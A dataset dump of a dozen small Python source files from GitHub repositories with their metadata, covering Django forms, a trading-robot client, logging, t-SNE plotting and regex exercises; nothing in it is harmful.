repo_name
stringlengths 7
111
| __id__
int64 16.6k
19,705B
| blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
151
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_url
stringlengths 26
130
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
42
| visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 14.6k
687M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 12
values | gha_fork
bool 2
classes | gha_event_created_at
timestamp[ns] | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_size
int64 0
10.2M
⌀ | gha_stargazers_count
int32 0
178k
⌀ | gha_forks_count
int32 0
88.9k
⌀ | gha_open_issues_count
int32 0
2.72k
⌀ | gha_language
stringlengths 1
16
⌀ | gha_archived
bool 1
class | gha_disabled
bool 1
class | content
stringlengths 10
2.95M
| src_encoding
stringclasses 5
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 10
2.95M
| extension
stringclasses 19
values | num_repo_files
int64 1
202k
| filename
stringlengths 4
112
| num_lang_files
int64 1
202k
| alphanum_fraction
float64 0.26
0.89
| alpha_fraction
float64 0.2
0.89
| hex_fraction
float64 0
0.09
| num_lines
int32 1
93.6k
| avg_line_length
float64 4.57
103
| max_line_length
int64 7
931
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
nathaniel-prog/sofproject | 13,271,448,962,479 | 5247e956398d4b20df00b4120da5c9f4a445d049 | ac23a4af430f92868ce1bd0c7571fe78e9ba6ffe | /routs/forms.py | a0b52541879a68b813b1cba669fd3c822099bfcc | []
| no_license | https://github.com/nathaniel-prog/sofproject | 52501ba050b3cf5dd10911fd283bee323dce491c | 16fedf099f1e5e63883ea6a1a01965b9a3fd0ba5 | refs/heads/master | 2023-02-07T22:11:11.671001 | 2020-12-30T09:23:30 | 2020-12-30T09:23:30 | 294,345,213 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bemember.forms import PersonForm
from media.images.forms import HotelForm , AppartForm
from django import forms
from bemember.models import Post
from routs.models import Town
class CommentForm(forms.Form):
name = forms.CharField(widget=forms.TextInput(attrs={'class': 'special'}))
comment = forms.CharField(widget=forms.Textarea(attrs={'size': '40'}))
class PostForm(forms.Form):
class Meta:
model=Post
fields = ['titre','author','body','post_date','likes']
class TownForm(forms.ModelForm):
class Meta:
model=Town
fields = ['name']
| UTF-8 | Python | false | false | 610 | py | 74 | forms.py | 45 | 0.67541 | 0.672131 | 0 | 27 | 21.111111 | 78 |
Nevada228/simple-fuzzy-example | 13,211,319,452,387 | 77a0c0230864d28f5a1a06ba08f1b10c073c3d0e | bfd58743308912a57e28f9dafa231b656cc0986c | /utils.py | 71c88b42c9595760338b2221c4fe24ddce28a935 | []
| no_license | https://github.com/Nevada228/simple-fuzzy-example | 367d6acfe155692d54a27bac6736607fd96066cf | a6b5bec51ae3db252530731aeba5f5876fd881c6 | refs/heads/master | 2021-03-18T19:40:27.740760 | 2020-03-17T09:38:13 | 2020-03-17T09:38:13 | 247,095,238 | 1 | 1 | null | false | 2020-03-17T09:38:15 | 2020-03-13T14:51:49 | 2020-03-15T12:44:46 | 2020-03-17T09:38:14 | 3 | 1 | 1 | 0 | Python | false | false | from skfuzzy import control as ctrl
from constants import *
class RuleBuilder:
@staticmethod
def build_rule(antecedents, consequent, response: ResponseEnum, req_quality: list):
if len(req_quality) != len(REQUIREMENTS):
raise Exception("Ээээ!")
rule_body = None
try:
for ant, quality in zip(antecedents, req_quality):
if rule_body is None:
rule_body = ant[quality.name]
else:
rule_body = rule_body & ant[quality.name]
except Exception:
print('Это что ещё такое?')
return ctrl.Rule(rule_body, consequent[response.name])
| UTF-8 | Python | false | false | 694 | py | 4 | utils.py | 4 | 0.585799 | 0.585799 | 0 | 19 | 34.578947 | 87 |
jvastbinder/tinyhands | 18,683,107,756,209 | 93f6e5d5a1b3d097dd77ddd3d6221f39402ae349 | 201922e0451af60aa97b217e08b67f2ce461d657 | /application/budget/pdfexports/mdf_exports.py | 438cf9dbecfcf80b9c23785b50efcf9ec04e4e3b | []
| no_license | https://github.com/jvastbinder/tinyhands | d79b9d53bbdab2c105399c5710c0a81568544743 | a5b9e7fb22c9074c39993ed58d3a840fd3c87ad4 | refs/heads/master | 2020-03-15T02:23:55.355383 | 2018-03-16T21:01:24 | 2018-03-16T21:01:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from budget.pdfexports.pdf_creator import BasePDFCreator
from budget.helpers import MoneyDistributionFormHelper
import zipfile
from io import BytesIO
class MDFExporter(BasePDFCreator):
template_name = 'budget/MoneyDistributionTemplateV2.rml'
def __init__(self, mdf_id):
super(MDFExporter, self).__init__(self.template_name, self.get_mdf_data(mdf_id))
def get_mdf_data(self, mdf_id):
mdf_helper = MoneyDistributionFormHelper(mdf_id)
return {
'name': mdf_helper.station_name,
'date': mdf_helper.date_entered,
'sections': mdf_helper.sections,
'total': mdf_helper.total
}
class MDFBulkExporter():
def __init__(self, budgets):
self.budgets = budgets
def create(self):
output = BytesIO()
mdf_zip = zipfile.ZipFile(output, 'w')
for budget in self.budgets:
pdf = MDFExporter(budget).create()
mdf_zip.writestr(budget.mdf_file_name(), pdf.getvalue())
mdf_zip.close()
return output
| UTF-8 | Python | false | false | 1,060 | py | 45 | mdf_exports.py | 39 | 0.630189 | 0.629245 | 0 | 36 | 28.444444 | 88 |
misakimeidaisuki/ganid-livedns-update | 10,368,051,076,797 | 897fbb024f766a541f9478741498c5676d84c524 | 75824d946d271fa7ef6c446b858872dd4e903185 | /update_log.py | 9514b471138165d281773c4bd629a8956eea9efa | [
"MIT"
]
| permissive | https://github.com/misakimeidaisuki/ganid-livedns-update | 3cd0a55ecce7471b1441c6841a88edf1a5110d2b | eda8a474a1b896ff6cd9e5f8ecf973e56ce9841f | refs/heads/master | 2020-04-23T15:00:22.316081 | 2019-02-18T15:12:51 | 2019-02-18T15:12:51 | 171,250,205 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import logging
class updateLog(object):
def __init__(self, filename="update.log", level=logging.DEBUG):
self.__path = os.path.dirname(os.path.realpath(__file__))
self.logger = logging.getLogger()
self.logger.setLevel(level)
format = "%(asctime)s - [%(levelname)s]:%(message)s"
date_format = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(format, datefmt=date_format)
filepath = os.path.join(self.__path, filename)
file_handler = logging.FileHandler(filepath);
file_handler.setLevel(level)
file_handler.setFormatter(formatter)
console_handler = logging.StreamHandler()
console_handler.setLevel(level)
console_handler.setFormatter(formatter)
self.logger.addHandler(console_handler)
self.logger.addHandler(file_handler)
def debug(self, message):
self.logger.debug(message)
def info(self, message):
self.logger.info(message)
def warning(self, message):
self.logger.warning(message)
def setLevel(self, level):
self.logger.setLevel(level)
| UTF-8 | Python | false | false | 1,126 | py | 7 | update_log.py | 5 | 0.64476 | 0.64476 | 0 | 35 | 31.171429 | 67 |
hotdl/python-tutorials | 10,376,641,036,460 | 2ad57e67cdffb511bca12336071cffabcfe5bd4a | 02f5833453289823eba6f532b8491cbfd977a048 | /base/number.py | d7c65b8035f2b6bd83b42d9dfa07f430a9fd8e21 | []
| no_license | https://github.com/hotdl/python-tutorials | 2fcbcdd41f6d6d4efe45a9c879a089ff32f3acbc | b78e15fc29b129275ed283208b97118c7cf4f554 | refs/heads/master | 2020-04-22T22:17:46.790396 | 2019-02-14T16:19:56 | 2019-02-14T16:19:56 | 170,702,886 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | if __name__ == "__main__":
print(2 + 2)
print(8 / 5)
print(8//5)
print(8 % 5)
print(8*2)
print(8**2)
print(8.0/2)
print(2 + 2J)
| UTF-8 | Python | false | false | 160 | py | 4 | number.py | 3 | 0.425 | 0.31875 | 0 | 9 | 16.777778 | 26 |
TedMusk/Python_Network_Programming | 11,321,533,836,681 | 2a07f09ec04d6f89cb727247d0402cec1c6e2c22 | d50351d70ffb0f0f0b828f7364f6253c87672a07 | /chapter01/search1.py | db09a61a9f911055ae401b502269d6ba5c01a436 | []
| no_license | https://github.com/TedMusk/Python_Network_Programming | c21c52f9be9b9b28cb699ca96def7c6728b25370 | b8e8f5cd9f080440b9f6bc0a916800cf2ed30277 | refs/heads/master | 2021-01-22T04:01:21.833530 | 2017-05-25T16:37:57 | 2017-05-25T16:37:57 | 92,421,208 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding: utf-8
'''
Created by Musk on 2017/5/26.
'''
from pygeocoder import Geocoder
if __name__ == '__main__':
address = 'HangZhou'
| UTF-8 | Python | false | false | 137 | py | 4 | search1.py | 2 | 0.620438 | 0.562044 | 0 | 9 | 14.222222 | 31 |
tom2rd/pylayers | 9,534,827,427,217 | bead71cfcbd55d1b308ffda209591a03e8dc8e12 | af1e443f06a50a2eda5cffbf72d9d692888e4d53 | /pylayers/gis/test/test_taoffice.py | ff8ad2742f44d16038167e00c4e49b630ac94e9f | [
"MIT",
"GPL-3.0-or-later"
]
| permissive | https://github.com/tom2rd/pylayers | 2a470cf9d3f9b793459dfccde83bfc5c24f08d1d | 84bdc924ae8055313b9ec833f0509000b0a30f45 | refs/heads/master | 2020-08-30T00:16:39.555371 | 2019-10-29T05:51:50 | 2019-10-29T05:51:50 | 218,210,476 | 0 | 0 | MIT | true | 2019-10-29T05:26:11 | 2019-10-29T05:26:11 | 2019-10-19T11:54:09 | 2019-10-22T22:44:38 | 795,400 | 0 | 0 | 0 | null | false | false | from pylayers.gis.layout import *
from pylayers.simul.link import *
L = Layout('TA-Office.ini',force=True)
##L.build()
#plt.ion()
##L.showG('st',aw=True,labels=True,nodelist=L.ldiffout)
#f,lax= plt.subplots(2,2)
#L.showG('s',aw=True,labels=True,fig=f,ax=lax[0][0])
#lax[0][0].set_title('Gs',fontsize=18)
#L.showG('st',aw=True,labels=True,fig=f,ax=lax[0][1])
#lax[0][1].set_title('Gt',fontsize=18)
#L.showG('v',aw=True,labels=True,fig=f,ax=lax[1][0])
#lax[1][0].set_title('Gv',fontsize=18)
#L.showG('i',aw=True,labels=True,fig=f,ax=lax[1][1])
#lax[1][1].set_title('Gi',fontsize=18)
#
##DL = DLink(L=L)
##DL.a = np.array([-3,6.2,1.5])
##DL.eval(force=['sig','ray','Ct','H'],ra_vectorized=True,diffraction=True)
#
##DL.b = np.array([12.5,30,1.5])
| UTF-8 | Python | false | false | 745 | py | 313 | test_taoffice.py | 245 | 0.644295 | 0.593289 | 0 | 22 | 32.863636 | 75 |
OsAlex/algo_python | 5,695,126,652,084 | e7ab319977e407ee6d15c06483dc47a34be9b855 | 5402a5a5fbe3d958e808b846f18c68bc7698c7bf | /lesson_1/lesson_01_2.py | 7e51ae7ed927dc26f77924e382f84e4c20ecfe1c | []
| no_license | https://github.com/OsAlex/algo_python | 29507cac67c69a72725b7bafd84c61f254a9a655 | e8700af2fd89e133a08f4cb235b922e22995d8b2 | refs/heads/master | 2020-05-14T15:00:46.404602 | 2019-05-16T12:07:49 | 2019-05-16T12:07:49 | 181,844,462 | 0 | 0 | null | false | 2019-05-16T12:07:49 | 2019-04-17T07:59:20 | 2019-05-10T08:12:44 | 2019-05-16T12:07:49 | 165 | 0 | 0 | 1 | Python | false | false | # 2. Выполнить логические побитовые операции «И», «ИЛИ» и др. над числами 5 и 6.
# Выполнить над числом 5 побитовый сдвиг вправо и влево на два знака.
# Объяснить полученный результат.
i = 5 & 6
print('5 = ', bin(5),', 6 = ', bin(6), ', 5 & 6 = ', bin(i), ' = ', i)
i = 5 | 6
print('5 = ', bin(5),', 6 = ', bin(6), ', 5 | 6 = ', bin(i), ' = ', i)
i = 5 << 2
print('Print 5 << 2: ', bin(5), ' << 2 = ', bin(i), ' = ', i)
i = 5 >> 2
print('Print 5 >> 2: ', bin(5), ' >> 2 = ', bin(i), ' = ', i) | UTF-8 | Python | false | false | 638 | py | 32 | lesson_01_2.py | 31 | 0.481928 | 0.417671 | 0 | 15 | 32.266667 | 81 |
web8341/python-trading-robot | 14,705,968,065,446 | bff6799afd012a8300b13b86e24a10a25a413efa | 70bc9a1ffec4c3d7580b3280692a65890bdede05 | /pyrobot/robot.py | 707356de3e10a93b0c240edf06a97411c4370f4a | [
"MIT"
]
| permissive | https://github.com/web8341/python-trading-robot | 035401a6a8bd9bb840adb8d16a0d32b80455e212 | c10af5daae2e18119c0cecc5f250484624f5f548 | refs/heads/master | 2022-08-25T11:03:52.849313 | 2020-05-22T14:09:37 | 2020-05-22T14:09:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from td.client import TDClient
from datetime import datetime, time, timezone
from pyrobot.portfolio import Portfolio
from pyrobot.trades import Trade
class PyRobot():
def __init__(self, client_id: str, redirect_uri: str, credentials_path: str = None, trading_account: str = None) -> None:
"""Initalizes a new instance of the robot and logs into the API platform specified.
Arguments:
----
client_id {str} -- The Consumer ID assigned to you during the App registration.
This can be found at the app registration portal.
redirect_uri {str} -- This is the redirect URL that you specified when you created your
TD Ameritrade Application.
Keyword Arguments:
----
credentials_path {str} -- The path to the session state file used to prevent a full
OAuth workflow. (default: {None})
trading_account {str} -- Your TD Ameritrade account number. (default: {None})
"""
# Set the attirbutes
self.trading_account: str = trading_account
self.client_id: str = client_id
self.redirect_uri: str = redirect_uri
self.credentials_path:str = credentials_path
self.session: TDClient = self._create_session()
self.trades: dict = {}
def _create_session(self) -> TDClient:
"""Start a new session.
Creates a new session with the TD Ameritrade API and logs the user into
the new session.
Returns:
----
TDClient -- A TDClient object with an authenticated sessions.
"""
# Create a new instance of the client
td_client = TDClient(
client_id = self.client_id,
redirect_uri = self.redirect_uri,
credentials_path = self.credentials_path
)
# log the client into the new session
td_client.login()
return td_client
@property
def pre_market_open(self) -> bool:
"""Checks if pre-market is open.
Uses the datetime module to create US Pre-Market Equity hours in
UTC time.
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> pre_market_open_flag = trading_robot.pre_market_open
>>> pre_market_open_flag
True
Returns:
----
bool -- True if pre-market is open, False otherwise.
"""
pre_market_start_time = datetime.now().replace(hour = 12, minute = 00, second = 00, tzinfo = timezone.utc).timestamp()
market_start_time = datetime.now().replace(hour = 13, minute = 30, second = 00, tzinfo = timezone.utc).timestamp()
right_now = datetime.now().replace(tzinfo = timezone.utc).timestamp()
if market_start_time >= right_now >= pre_market_start_time:
return True
else:
return False
@property
def post_market_open(self):
"""Checks if post-market is open.
Uses the datetime module to create US Post-Market Equity hours in
UTC time.
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> post_market_open_flag = trading_robot.post_market_open
>>> post_market_open_flag
True
Returns:
----
bool -- True if post-market is open, False otherwise.
"""
post_market_end_time = datetime.now().replace(hour = 22, minute = 30, second = 00, tzinfo = timezone.utc).timestamp()
market_end_time = datetime.now().replace(hour = 20, minute = 00, second = 00, tzinfo = timezone.utc).timestamp()
right_now = datetime.now().replace(tzinfo = timezone.utc).timestamp()
if post_market_end_time >= right_now >= market_end_time:
return True
else:
return False
@property
def regular_market_open(self):
"""Checks if regular market is open.
Uses the datetime module to create US Regular Market Equity hours in
UTC time.
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> market_open_flag = trading_robot.market_open
>>> market_open_flag
True
Returns:
----
bool -- True if post-market is open, False otherwise.
"""
market_start_time = datetime.now().replace(hour = 13, minute = 30, second = 00, tzinfo = timezone.utc).timestamp()
market_end_time = datetime.now().replace(hour = 20, minute = 00, second = 00, tzinfo = timezone.utc).timestamp()
right_now = datetime.now().replace(tzinfo = timezone.utc).timestamp()
if market_end_time >= right_now >= market_start_time:
return True
else:
return False
def create_portfolio(self) -> Portfolio:
"""Create a new portfolio.
Creates a Portfolio Object to help store and organize positions
as they are added and removed during trading.
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> portfolio = trading_robot.create_portfolio()
>>> portfolio
<pyrobot.portfolio.Portfolio object at 0x0392BF88>
Returns:
----
Portfolio -- A pyrobot.Portfolio object with no positions.
"""
# Initalize the portfolio.
self.portfolio = Portfolio(account_number = self.trading_account)
return self.portfolio
def create_trade(self, enter_or_exit: str, long_or_short: str, order_type: str = 'mkt', price: float = 0.0, stop_limit_price = 0.0) -> Trade:
"""Initalizes a new instance of a Trade Object.
This helps simplify the process of building an order by using pre-built templates that can be
easily modified to incorporate more complex strategies.
Arguments:
----
enter_or_exit {str} -- Defines whether this trade will be used to enter or exit a position.
If used to enter, specify `enter`. If used to exit, speicfy `exit`.
long_or_short {str} -- Defines whether this trade will be used to go long or short a position.
If used to go long, specify `long`. If used to go short, speicfy `short`.
Keyword Arguments:
----
order_type {str} -- Defines the type of order to initalize. Possible values
are `'mkt', 'lmt', 'stop', 'stop-lmt', 'trailign-stop'` (default: {'mkt'})
price {float} -- The Price to be associate with the order. If the order type is `stop` or `stop-lmt` then
it is the stop price, if it is a `lmt` order then it is the limit price, and `mkt` is the market
price.(default: {0.0})
stop_limit_price {float} -- Only used if the order is a `stop-lmt` and represents the limit price of
the `stop-lmt` order. (default: {0.0})
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> new_trade = trading_robot_portfolio.create_trade(
enter_or_exit='enter',
long_or_short='long',
order_type='mkt'
)
>>> new_trade
>>> new_market_trade = trading_robot_portfolio.create_trade(
enter_or_exit='enter',
long_or_short='long',
order_type='mkt',
price=12.00
)
>>> new_market_trade
>>> new_stop_trade = trading_robot_portfolio.create_trade(
enter_or_exit='enter',
long_or_short='long',
order_type='stop',
price=2.00
)
>>> new_stop_trade
>>> new_stop_limit_trade = trading_robot_portfolio.create_trade(
enter_or_exit='enter',
long_or_short='long',
order_type='stop-lmt',
price=2.00,
stop_limit_price=1.90
)
>>> new_stop_limit_trade
Returns:
----
Trade -- A pyrobot.Trade object with the specified template.
"""
# Initalize a new trade object.
trade = Trade()
# Create a new trade.
trade.new_trade(
order_type=order_type,
side=long_or_short,
enter_or_exit=enter_or_exit,
price=price,
stop_limit_price=stop_limit_price
)
return trade
def delete_trade(self):
pass
def grab_current_quotes(self) -> dict:
"""Grabs the current quotes for all positions in the portfolio.
Makes a call to the TD Ameritrade Get Quotes endpoint with all
the positions in the portfolio. If only one position exist it will
return a single dicitionary, otherwise a nested dictionary.
Usage:
----
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> trading_robot_portfolio.add_position(
symbol='MSFT',
asset_type='equity'
)
>>> current_quote = trading_robot.grab_current_quotes()
>>> current_quote
{
"MSFT": {
"assetType": "EQUITY",
"assetMainType": "EQUITY",
"cusip": "594918104",
...
"regularMarketPercentChangeInDouble": 0,
"delayed": true
}
}
>>> trading_robot = PyRobot(
client_id=CLIENT_ID,
redirect_uri=REDIRECT_URI,
credentials_path=CREDENTIALS_PATH
)
>>> trading_robot_portfolio.add_position(
symbol='MSFT',
asset_type='equity'
)
>>> trading_robot_portfolio.add_position(
symbol='AAPL',
asset_type='equity'
)
>>> current_quote = trading_robot.grab_current_quotes()
>>> current_quote
{
"MSFT": {
"assetType": "EQUITY",
"assetMainType": "EQUITY",
"cusip": "594918104",
...
"regularMarketPercentChangeInDouble": 0,
"delayed": False
},
"AAPL": {
"assetType": "EQUITY",
"assetMainType": "EQUITY",
"cusip": "037833100",
...
"regularMarketPercentChangeInDouble": 0,
"delayed": False
}
}
Returns:
----
dict -- A dictionary containing all the quotes for each position.
"""
# First grab all the symbols.
symbols = self.portfolio.positions.keys()
# Grab the quotes.
quotes = self.session.get_quotes(instruments = list(symbols))
return quotes
| UTF-8 | Python | false | false | 11,780 | py | 7 | robot.py | 6 | 0.533531 | 0.525552 | 0 | 353 | 32.371105 | 145 |
lrj1197/Final-project- | 15,908,558,908,230 | 1e7b037665d9bde2800c0ded5f935a881916dd99 | d132e903498a9a893e810393cfe26074980f6730 | /Numerical_Part_1.py | f36e64236d5b28464d9801257ded2d8ec77f5442 | []
| no_license | https://github.com/lrj1197/Final-project- | 8ec85879d766d6c85b42f987c360d10c1b3f6621 | 097ed277d4d1c5ebf2657bbc1ab9bc68cc677fef | refs/heads/master | 2021-08-23T16:09:39.423842 | 2017-12-05T15:58:15 | 2017-12-05T15:58:15 | 112,251,216 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import *
from scipy import *
import scipy as sp
def Numerical():
alpha = 1
beta = 1
gamma = 1
Rho_0 = 1
Rs = 1
G = 1
params = [alpha,beta,gamma,Rho_0,Rs,G]
#define R as a linear space
R_min = 0.1
R_max = 60
R_step = 10000
R = np.linspace(R_min,R_max,R_step)
#define the density profile
Rho =Rho_0/ ((1+(R/Rs)**2)**(3/2))
#Rho_0/ ( (R/Rs)**gamma * (1+(R/Rs)**alpha)**((beta-gamma)/alpha) ) Somethings worng with this one
#Rho_0/ ((1+(R/Rs)**2)**(3/2)) works well
#Get Rho as a list
#Rho = Rho(R,params)
J = 2*np.pi*R #The Jacodian for the integral
U = J*Rho #the integrand
#print(U)
#Get the mass as a list
#requieres an integral
M = cumtrapz(U, x=R, dx = R_step, initial = 0)
#M = M(Rho,R,params)
#print M
V = np.sqrt((G*M)/R)
plt.figure
plt.plot(R,V)
plt.plot(R,U)
plt.plot(R,M)
plt.show()
if __name__ == '__Numerical__':
Numerical()
Numerical()
| UTF-8 | Python | false | false | 1,084 | py | 6 | Numerical_Part_1.py | 4 | 0.548893 | 0.520295 | 0 | 51 | 20.254902 | 102 |
python-gino/authlib-gino | 10,041,633,576,354 | b625785d449b301d15c70c24fc794fc3223a6f6a | 22e4d1987bac5079a0477bad7f149473299eebb5 | /src/authlib_gino/fastapi_session/gino_app.py | ec660e612669eb8af54e7de83aec110c586f4161 | []
| no_license | https://github.com/python-gino/authlib-gino | ced8cf69dd7b2faaa87ee2d59698fdcd89a145d6 | 94a8a104b4b5e1e6a369bbc94a952039fafffbf0 | refs/heads/master | 2023-04-21T05:05:51.576362 | 2020-09-04T21:51:07 | 2020-09-07T21:39:45 | 269,523,103 | 3 | 1 | null | false | 2021-05-13T20:47:58 | 2020-06-05T03:35:09 | 2020-09-07T21:39:49 | 2021-05-13T20:47:57 | 131 | 3 | 1 | 4 | Python | false | false | from importlib.metadata import entry_points
def load_entry_point(name, default_factory=None):
for ep in entry_points().get("gino.app", []):
if ep.name == name:
return ep.load()
return default_factory()
| UTF-8 | Python | false | false | 232 | py | 22 | gino_app.py | 20 | 0.642241 | 0.642241 | 0 | 8 | 28 | 49 |
igor-morawski/LL-tSNE | 10,033,043,626,416 | 8d6dc324061bba2dfb40b88878ae55b5c4d91802 | 97b5a35cbf48bf561084645e67a1ddccf115c4a6 | /tsne.py | 0d9573d5874a425ba555a32836511d0ba6073ae0 | []
| no_license | https://github.com/igor-morawski/LL-tSNE | 55202c226e5ef9068ad695ec219328936888a449 | b650e4062830f08f58690385f62cf3b82a4c8138 | refs/heads/main | 2023-06-25T10:23:15.263579 | 2021-07-23T11:26:24 | 2021-07-23T11:26:24 | 349,344,183 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # python tsne.py /tmp2/igor/LL-tSNE/features/S_R50_epoch_121-1.pkl --output_dir=tsne
# python tsne.py /tmp2/igor/LL-tSNE/features_manual/COCO_R50_epoch_1-1.pkl --output_dir=manual --lr=10 --perplexity=5
# https://towardsdatascience.com/how-to-tune-hyperparameters-of-tsne-7c0596a18868
import argparse
import tqdm
from PIL import Image
import glob
import os
import os.path as op
import pickle
import tqdm
import matplotlib.pyplot as plt
import matplotlib.patheffects as PathEffects
import matplotlib
from matplotlib.lines import Line2D
import numpy as np
import sklearn
from sklearn.manifold import TSNE
import seaborn as sns
TSNE_DEFAULT = {"n_iter" : 3*5000, "random_state" : 3, "init":"pca"}
def scatter(x, colors, cats, alpha=1):
# https://github.com/oreillymedia/t-SNE-tutorial
# We choose a color palette with seaborn.
rgb_palette = np.array(sns.color_palette("hls", len(cats)))
palette = np.c_[rgb_palette, alpha*np.ones(rgb_palette.shape[0])]
# We create a scatter plot.
f = plt.figure(figsize=(8, 8))
ax = plt.subplot(aspect='equal')
sc = ax.scatter(x[:,0], x[:,1], lw=0, s=40,
c=palette[colors.astype(np.int)])
plt.xlim(-25, 25)
plt.ylim(-25, 25)
ax.axis('off')
ax.axis('tight')
# We add the labels for each class.
txts = []
for i in range(len(cats)):
# Position of each label.
xtext, ytext = np.median(x[colors == i, :], axis=0)
txt = ax.text(xtext, ytext, str(i), fontsize=24)
txt.set_path_effects([
PathEffects.Stroke(linewidth=5, foreground="w"),
PathEffects.Normal()])
txts.append(txt)
# custom legend
# rgba_palette = x=np.c_[palette, np.ones(palette.shape[0])]
legend_elements = [Line2D([0], [0], marker='o', color=palette[i], label="{}, ({})".format(cats[i], i),
markerfacecolor=palette[i], markersize=15) for i in range(len(cats))]
ax.legend(handles=legend_elements, loc='lower right')
return f, ax, sc, txts
def read_pickle(args):
x = []
y = []
cats = set()
with open(args.pickled_features, "rb") as handle:
data = pickle.load(handle)
for idx, sample in tqdm.tqdm(enumerate(data)):
features = sample["features"]
img_metas = sample["img_metas"]
cat_name = "_".join(img_metas["ori_filename"].split("_")[:2])
if args.cat and (args.cat not in cat_name):
continue
cats.add(cat_name)
x.append(features)
y.append(cat_name)
cats = tuple(sorted(list(cats)))
for cat in cats:
cat_n = y.count(cat)
print(f"{cat} - {cat_n} samples")
cats_name2int = cats.index
x = np.array(x)
B, C, H, W = x.shape
std=np.moveaxis(x, 0, 1).std(axis=(1,2,3))
for c in range(C):
x[:, c, :, :]/=std[c]
x = x.reshape(B, -1)
y = np.hstack([cats_name2int(cat_name) for cat_name in y])
return x, y, cats
if __name__ == "__main__":
# https://github.com/oreillymedia/t-SNE-tutorial
parser = argparse.ArgumentParser(description='')
parser.add_argument('pickled_features')
parser.add_argument('--output_dir', type=str)
parser.add_argument('--lr', default=200, type=int)
parser.add_argument('--perplexity', default=None, type=int)
parser.add_argument('--cat', default=None, type=str)
args = parser.parse_args()
assert 1.0 <= args.lr <= 1000.0
if not op.exists(args.output_dir):
os.mkdir(args.output_dir)
assert op.exists(args.output_dir)
plot_dir = op.join(args.output_dir, op.split(args.pickled_features)[-1].split(".")[0])
if not op.exists(plot_dir):
os.mkdir(plot_dir)
assert op.exists(plot_dir)
x, y, cats = read_pickle(args)
cat_prefix = "all" if not args.cat else args.cat
perplexities = [args.perplexity] if args.perplexity else [10, 30, 50]
for perplexity in perplexities:
tsne = TSNE(learning_rate=args.lr, perplexity=perplexity, **TSNE_DEFAULT).fit_transform(x)
scatter(tsne, y, cats, alpha=0.5)
print(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.png"))
plt.savefig(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.png"))
plt.savefig(op.join(plot_dir, f"{cat_prefix}_p{perplexity}_lr{int(args.lr)}.svg"))
| UTF-8 | Python | false | false | 4,384 | py | 12 | tsne.py | 11 | 0.617473 | 0.5974 | 0 | 117 | 36.358974 | 117 |
allonbrooks/cainiao | 14,010,183,359,511 | 96482d59fc470ab6a507c791b25a91165536081b | 6f80ca6891c240a7f58d1e2240117adcac5ff61a | /涉及嵌套分组与命名分组的正则练习一则.py | dd5780c4c4a9bb0b324f587997e406c31dbe11fc | []
| no_license | https://github.com/allonbrooks/cainiao | 73f739a6eb27befaa80ab8a5ad1f7d6238d56b1d | 705443ee87806187b61e13d59bd2ad465c10653e | refs/heads/master | 2020-04-28T00:41:40.782408 | 2019-03-10T13:21:05 | 2019-03-10T13:21:05 | 174,825,626 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/2/28 22t:02
# @Author : HandSome
# @File : 涉及嵌套分组与命名分组的正则练习一则.py
"""
有文本若干行如下,请写出正则匹配出以 param 开头的参数信息,输出格式为:字段名称、字段类型(不带尖括号)、是否可选(不带尖括号)和字段含义四部分内容。
#param nickname <str> 昵称
#param sex <int> <可选> 学员性别,1 男,2 女
"""
import re
text = '''
#param nickname <str> 昵称
#param sex <int> <可选> 学员性别,1 男,2 女
'''
import re
text = """
#param nickname <str> 昵称
#param sex <int> <可选> 学员性别,1 男,2 女
"""
# 使用命名分组
p = re.compile(r'#param\s+(?P<name>[a-zA-Z]+)\s+<(?P<type>[a-zA-Z]+)>(\s+<(?P<opt>.+)>)?\s+(?P<desc>.+)')
result = p.finditer(text)
for i in result:
print(i.group('name', 'type', 'opt', 'desc'))
| UTF-8 | Python | false | false | 977 | py | 35 | 涉及嵌套分组与命名分组的正则练习一则.py | 35 | 0.553846 | 0.528671 | 0 | 31 | 22.064516 | 105 |
